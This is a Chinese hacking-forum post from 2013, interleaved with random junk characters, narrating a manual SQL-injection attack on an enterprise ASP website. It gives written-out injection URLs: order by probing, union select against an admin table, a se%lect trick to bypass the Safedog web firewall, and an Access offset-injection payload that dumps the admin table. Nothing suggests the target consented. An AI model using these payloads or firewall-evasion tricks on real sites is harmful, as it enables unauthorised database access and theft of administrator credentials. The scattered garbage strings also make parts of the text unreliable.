找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2101|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
打开网站,一个企业站。1 v, G" }0 ]3 K3 f4 i+ Q" t
( g" R# G0 X- V+ I0 b, f- q/ G
5 R: @; J, o7 N1 U4 a& b
顺手加个admin
0 G) J+ q! c" e' R
) X9 v5 X" ?" n/ F' X6 e, Q) s. l  s4 w% z
默认后台。  }" T, G7 a  u9 Z4 _1 Q. Y
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​9 ?5 j0 h6 y0 b! t( O( j

4 i0 F) L& ]( Z5 C7 R; q, j8 p$ r  z5 C! F: i" m' B
/ S. K; e8 Q0 j$ A8 ?! J3 [
所以就不用御剑扫了,待会直接封IP。
2 W! t' g  c* d8 v 4 V& w  W8 B4 A* Z! R
用order by语句判断是否存在注入。8 j: B; H9 \& _) ^" p* o
http://www.xxx.com /product_show.asp?id=997 order by 1/ R8 z8 Z: r3 {! ?- T
http://www.xxx.com /product_show.asp?id=997 order by 100
" D/ X3 r2 D5 u5 _" h4 u# P3 P' x现在存在注入,经测试后发现是9个字段。
3 ^* s6 g, p# b8 A) u : c6 @  @1 n: \
接下来进行联合查询,猜是否存在admin表。
' w) y+ a: }$ ?0 I3 `http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​
7 V5 o  |  I) z! E. x  L& p3 b  M5 {( \! B3 ~
8 v& i; v! h0 H: T' T' F
$ I' F9 O, N' f: R
在select中间加个%,se%lect绕过安全狗。5 V# r, |" t4 r$ ^
+ J! d8 ]7 O0 L. }) e' r
8 }# [! n3 B) p! t4 M2 q) X- q
发现存在admin表,然后开始手工猜常用的字段。, H' ]$ g- |) p0 f* ^
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
. G2 G# ?( ^* E
5 M6 X+ h1 Q3 `3 m5 j2 v; X突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
: W8 Q8 E! d! ?" E5 n + Q- D% ?. }8 Q! o+ T
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。+ a. E/ Y* i4 \( b" T
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
2 W" y# G: R3 d好了,敏感内容出显了。​
  Z9 ~) A3 q3 U2 N, p, [3 T! @6 l, y( Z7 B/ b

* m7 a5 }5 I3 R5 b
$ C2 W: f& b8 d* s( e
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表